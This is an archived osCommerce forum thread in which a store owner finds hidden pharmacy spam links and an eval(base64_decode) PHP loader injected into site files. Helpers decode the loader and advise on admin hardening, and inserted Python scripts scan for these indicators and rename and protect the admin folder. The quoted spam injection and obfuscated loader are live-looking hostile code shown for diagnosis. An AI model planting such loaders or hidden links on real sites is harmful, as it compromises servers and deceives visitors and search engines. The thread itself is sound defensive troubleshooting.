dusty108 Posted April 24, 2010

v2.2RC2

Google keywords has alerted me to the presence of the word "Cialis" on two of my web pages. When I checked the pages viewing the source this is what I found tagged on at the bottom of the page:

First Page: http://www.landnsea.co.uk/sailing-c-21.html

    <br>
    <script>document.write("<p sty"+"le=displ"+"ay:no"+"ne>");</script>
    <a href="http://www.premierinternet.com">generic cialis online</a>
    <a href="http://www.jan-oidium.com">generic cialis</a>
    <a href="http://www.cbn.co.za">generic viagra online</a>
    <a href="http://www.cantors.org">cheap cialis</a>
    <a href="http://www.technosci.com">cialis online</a>
    <a href="http://www.lolitadress.net">generic cialis online</a>
    <a href="http://www.mendocino-chocolate.com">cheap generic cialis</a>
    <a href="http://www.apoprecords.com">cialis no prescription</a>
    <a href="http://www.cardinalcorner.com">order cialis online</a>
    <a href="http://vehicleemergencylighting.com">online pharmacy cialis</a>
    <a href="http://www.tantrastoreonline.com">cialis price</a>
    <a href="http://www.polhn.org">order cheap drugs online</a>
    </p>
    </body>
    </html>

Second Page: http://www.landnsea.co.uk/penn-m-14.html

    <!-- footer_eof //-->
    <br>
    <script>document.write("<p sty"+"le=displ"+"ay:no"+"ne>");</script>
    <a href="http://www.premierinternet.com">generic cialis online</a>
    <a href="http://www.jan-oidium.com">generic cialis</a>
    <a href="http://www.cbn.co.za">generic viagra online</a>
    <a href="http://www.cantors.org">cheap cialis</a>
    <a href="http://www.technosci.com">cialis online</a>
    <a href="http://www.lolitadress.net">generic cialis online</a>
    <a href="http://www.mendocino-chocolate.com">cheap generic cialis</a>
    <a href="http://www.apoprecords.com">cialis no prescription</a>
    <a href="http://www.cardinalcorner.com">order cialis online</a>
    <a href="http://vehicleemergencylighting.com">online pharmacy cialis</a>
    <a href="http://www.tantrastoreonline.com">cialis price</a>
    <a href="http://www.polhn.org">order cheap drugs online</a>
    </p>
    </body>
    </html>

How do I go about cleaning this up? Can I just go back to a safe backup date? File permissions are all set at 755/644.
burt Posted April 24, 2010

You need to find out HOW the hack happened, then plug the hole. Reverting to a backup is no good.

You need to rename and password protect your Admin area NOW.

I have messaged you something interesting.
dusty108 Posted April 24, 2010

> You need to find out HOW the hack happened, then plug the hole. Reverting to a backup is no good.
> You need to rename and password protect your Admin area NOW.
> I have messaged you something interesting.

Thanks Burt. That was rather surprising.

Can you help with renaming admin? I tried changing the admin name but when I log in I have problems going through the different menus as they keep looking for admin.
burt Posted April 24, 2010

Log in FTP, rename the /admin/ folder to something completely random which would be hard to guess for anyone except you. E.g. /admin_qqq0wo38cnS/

Then download the file at *your new admin name*/includes/configure.php

In that file, you'll find two or three instances of "admin"; change that to the same as your newly renamed admin area. Upload it.

Then use cPanel (or whatever host control panel you have) to password protect the admin using htaccess/htpasswd.
burt Posted April 24, 2010

Oh and now find the security thread (it's a long one) and do all the security changes and sanitise your site of any existing bad code.
dusty108 Posted April 24, 2010

> Oh and now find the security thread (it's a long one) and do all the security changes and sanitise your site of any existing bad code.

I have found the following code has been inserted in a random selection of files on my site. Do you think it could be the culprit?

    <?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy92YXIvd3d3L3Zob3N0cy9sYW5kbnNlYS5jby51ay9odHRwZG9jcy9sYW5kbnNlYS9hZG1pbi9pbmNsdWRlcy9sYW5ndWFnZXMvZW5nbGlzaC9tb2R1bGVzL2luZGV4L3N0eWxlLmNzcy5waHAnO2lmKGZpbGVfZXhpc3RzKCRHTE9CQUxTWydtZnNuJ10pKXtpbmNsdWRlX29uY2UoJEdMT0JBTFNbJ21mc24nXSk7aWYoZnVuY3Rpb25fZXhpc3RzKCdnbWwnKSYmZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcpKXtvYl9zdGFydCgnZGdvYmgnKTt9fX0=')); ?>
germ Posted April 24, 2010

Decodes to:

    if(function_exists('ob_start')&&!isset($GLOBALS['mfsn'])){
        $GLOBALS['mfsn'] = '/var/www/vhosts/YOUR_DOMAIN.co.uk/httpdocs/YOUR_DOMAIN/admin/includes/languages/english/modules/index/style.css.php';
        if(file_exists($GLOBALS['mfsn'])){
            include_once($GLOBALS['mfsn']);
            if(function_exists('gml')&&function_exists('dgobh')){
                ob_start('dgobh');
            }
        }
    }

It's hack code. Also tells where to find one of their files:

    /admin/includes/languages/english/modules/index/style.css.php

If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.
"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice." - Me -
"Headers already sent" - The definitive help
"Cannot redeclare ..." - How to find/fix it
SSL Implementation Help
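Both indicators posted in this thread, the split-string document.write that opens a hidden paragraph in the page footer (first post) and the eval(base64_decode('...')) loader in the PHP files (decoded by germ above), can be hunted for with a file scan of the web root. The Python script below is an added example written for this thread; it is not from the thread, from osCommerce or from the author. It reassembles the concatenated document.write fragments, decodes any base64 payload passed to eval(), and lists the .php paths the payload references, which is what germ did by hand. The sample HTML and PHP it scans are constructed here (the payload is base64-encoded at runtime so its decoded text is known), and the regexes and file extensions are my assumptions about what these injections look like, not a complete signature set.

```python
import base64
import os
import re

# Indicator 1: document.write("<p sty"+"le=displ"+"ay:no"+"ne>") from the
# injected page footer. The string is split so a grep for "display:none"
# misses it; we capture the concatenated fragments and reassemble them.
DOCWRITE_RE = re.compile(r'document\.write\(\s*((?:"[^"]*"\s*\+\s*)*"[^"]*")\s*\)')
HIDDEN_P_RE = re.compile(r'<p\s+style\s*=\s*"?\s*display\s*:\s*none', re.I)

# Indicator 2: the eval(base64_decode('...')) loader found in the PHP files.
EVAL_B64_RE = re.compile(
    r"eval\s*\(\s*base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)\s*\)")
# Absolute .php paths inside a decoded payload (the loader's include target).
PHP_PATH_RE = re.compile(r"'(/[^']+\.php)'")

# Assumption: the file types worth scanning in a PHP storefront.
SCAN_EXTS = (".php", ".html", ".htm", ".js")


def reassemble_docwrite(fragments):
    """Join the quoted pieces of document.write("a"+"b"+...) into one string."""
    return "".join(re.findall(r'"([^"]*)"', fragments))


def scan_text(text):
    """Return (indicator, detail) tuples for every hit in one file's contents."""
    findings = []
    for m in DOCWRITE_RE.finditer(text):
        written = reassemble_docwrite(m.group(1))
        if HIDDEN_P_RE.search(written):
            findings.append(("hidden-paragraph-docwrite", written))
    for m in EVAL_B64_RE.finditer(text):
        try:
            payload = base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
        except ValueError:
            payload = "<undecodable base64>"
        findings.append(("eval-base64-loader", payload))
        # de-duplicate the referenced paths while keeping their order
        for path in dict.fromkeys(PHP_PATH_RE.findall(payload)):
            findings.append(("referenced-file", path))
    return findings


def scan_tree(root):
    """Walk a web root on disk and map each affected file to its findings."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith(SCAN_EXTS):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits = scan_text(fh.read())
                if hits:
                    report[path] = hits
    return report


# Constructed samples (not taken from a live site). The PHP payload is encoded
# here at runtime, so its decoded form is known exactly.
SAMPLE_HTML = ('<br> <script>document.write("<p sty"+"le=displ"+"ay:no"+"ne>");</script> '
               '<a href="http://spam.example/">generic cialis online</a> </p> </body> </html>')
SAMPLE_PAYLOAD = (
    "if(file_exists('/var/www/example/admin/includes/languages/english/modules/index/style.css.php'))"
    "{include_once('/var/www/example/admin/includes/languages/english/modules/index/style.css.php');}")
SAMPLE_PHP = "<?php /**/eval(base64_decode('%s')); ?>" % base64.b64encode(
    SAMPLE_PAYLOAD.encode()).decode()


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        for path, hits in scan_tree(sys.argv[1]).items():
            print(path)
            for kind, detail in hits:
                print("  %-26s %s" % (kind, detail[:120]))
    else:
        print(scan_text(SAMPLE_HTML))
        print(scan_text(SAMPLE_PHP))
```

Run it with the path to the web root (`python scan_injected.py /path/to/httpdocs`) to get a per-file list; with no argument it scans the two constructed samples. Scanning the files on disk rather than fetching pages matters here: the loader only activates when its include target exists, and nothing in a rendered page tells you which PHP files carry the eval() stub. Treat every "referenced-file" line as a second file to inspect and remove, and every file that contains an indicator as one to restore from a known-clean copy rather than edit.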
dusty108 Posted April 24, 2010

Thanks for decoding that for me. When I followed the path admin/includes/languages/english/modules/index/ the only files were customers.php and orders.php. No style.css.php. Strange?
germ Posted April 24, 2010

I didn't make the soup, Doc, I can only tell you what's in it... :blush:

The early versions of this hack showed their trash to anyone that viewed the page. Now they have it programmed so that it shows only when search engines index the site (keying off IP addresses). You don't even know you're hacked unless you look at your cache in Google or see the code in your files. :'(
dusty108 Posted April 24, 2010

My host has scanned my site and removed the infection their scanners picked up. The problem no longer shows on the two files I quoted earlier. I'm going to have to sort out my admin file and see what else I can do to secure my site. Thanks for your help.
germ Posted April 24, 2010

> My host has scanned my site and removed the infection their scanners picked up. The problem no longer shows on the two files I quoted earlier. I'm going to have to sort out my admin file and see what else I can do to secure my site. Thanks for your help.

There is a thread in this area on "How to Secure Your Site". Read that. Part of it is removing the file_manager.php and define_language.php in your admin.

I went to your site and the admin isn't protected by .htaccess. That being said, they can get into the site via a vulnerability in the aforementioned files. :o
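The admin hardening described across this thread (burt: rename /admin/ to a random name, fix the "admin" entries in the admin's includes/configure.php, password protect the directory with htaccess/htpasswd; germ: remove file_manager.php and define_language.php) can be done in one pass. The script below is an added example for this thread, not code from the thread, from osCommerce or from either poster. It assumes the osCommerce 2.2 layout in which admin/includes/configure.php stores the admin path in DIR_WS_ADMIN and DIR_FS_ADMIN as quoted strings ending in /admin/, and it only rewrites occurrences of that quoted path segment, so a database user that happens to contain "admin" is left alone. The demo store tree it builds is constructed here. It writes the .htaccess but leaves the .htpasswd to Apache's own htpasswd tool, since the standard library has no implementation of Apache's password hash formats.

```python
import os
import re
import shutil
import tempfile

# Files germ recommends removing from the admin area.
RISKY_ADMIN_FILES = ("file_manager.php", "define_language.php")

# Assumption (osCommerce 2.2): configure.php holds the admin path as a quoted
# string ending in /admin/, e.g. define('DIR_WS_ADMIN', '/admin/');
ADMIN_PATH_RE = re.compile(r"/admin/(?=['\"])")

HTACCESS_TEMPLATE = """AuthType Basic
AuthName "Store administration"
AuthUserFile {htpasswd}
Require valid-user
"""


def harden_admin(store_root, new_name, htpasswd_path):
    """Rename /admin/, fix configure.php, drop risky files, write .htaccess.

    Returns a summary dict so the caller (or a test) can check what changed.
    """
    old_dir = os.path.join(store_root, "admin")
    new_dir = os.path.join(store_root, new_name)
    if os.path.exists(new_dir):
        raise FileExistsError(new_dir)
    os.rename(old_dir, new_dir)

    # Point the "admin" path entries in configure.php at the new name.
    cfg_path = os.path.join(new_dir, "includes", "configure.php")
    with open(cfg_path, encoding="utf-8") as fh:
        cfg = fh.read()
    cfg, edits = ADMIN_PATH_RE.subn(lambda _m: "/%s/" % new_name, cfg)
    with open(cfg_path, "w", encoding="utf-8") as fh:
        fh.write(cfg)

    # Remove the admin scripts the thread names as the way in.
    removed = []
    for name in RISKY_ADMIN_FILES:
        path = os.path.join(new_dir, name)
        if os.path.exists(path):
            os.remove(path)
            removed.append(name)

    # Basic auth on the renamed directory. Create the password file with
    # Apache's tool, outside the web root:  htpasswd -c <htpasswd_path> <user>
    htpasswd_abs = os.path.abspath(htpasswd_path)
    htaccess = os.path.join(new_dir, ".htaccess")
    with open(htaccess, "w", encoding="utf-8") as fh:
        fh.write(HTACCESS_TEMPLATE.format(htpasswd=htpasswd_abs))

    return {"admin_dir": new_dir, "configure_edits": edits,
            "removed": removed, "htaccess": htaccess}


def build_demo_store(root):
    """Constructed stand-in for a store tree; not a real osCommerce install."""
    store = os.path.join(root, "httpdocs")
    os.makedirs(os.path.join(store, "admin", "includes"))
    fs_admin = os.path.join(store, "admin").replace(os.sep, "/")
    lines = [
        "<?php",
        "  define('HTTP_SERVER', 'http://www.example.test');",
        "  define('DIR_WS_ADMIN', '/admin/');",
        "  define('DIR_FS_ADMIN', '" + fs_admin + "/');",
        "  define('DIR_WS_CATALOG', '/');",
        "  define('DB_SERVER_USERNAME', 'admin_user');",  # not a path; must stay
        "?>",
    ]
    with open(os.path.join(store, "admin", "includes", "configure.php"), "w") as fh:
        fh.write("\n".join(lines) + "\n")
    for name in RISKY_ADMIN_FILES + ("index.php",):
        with open(os.path.join(store, "admin", name), "w") as fh:
            fh.write("<?php // placeholder ?>\n")
    return store


def demo():
    """Harden a throwaway demo store and report what changed."""
    root = tempfile.mkdtemp(prefix="oscdemo_")
    try:
        store = build_demo_store(root)
        result = harden_admin(store, "admin_qqq0wo38cnS",
                              os.path.join(root, "private", ".htpasswd"))
        new_dir = result["admin_dir"]
        with open(os.path.join(new_dir, "includes", "configure.php")) as fh:
            result["configure_text"] = fh.read()
        with open(result["htaccess"]) as fh:
            result["htaccess_text"] = fh.read()
        result["old_dir_gone"] = not os.path.exists(os.path.join(store, "admin"))
        result["remaining"] = sorted(os.listdir(new_dir))
        return result
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    r = demo()
    print("renamed; %d configure.php edit(s); removed %s" % (r["configure_edits"], r["removed"]))
```

On a real store call harden_admin() with the web root, your random name and an .htpasswd path outside the web root, then run htpasswd -c on that path and confirm the browser prompts for credentials before anything under the new admin URL loads. Keep the old directory name out of the configuration entirely: after the rename, a leftover '/admin/' in configure.php is exactly what makes the menus "keep looking for admin".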
This topic is now archived and is closed to further replies.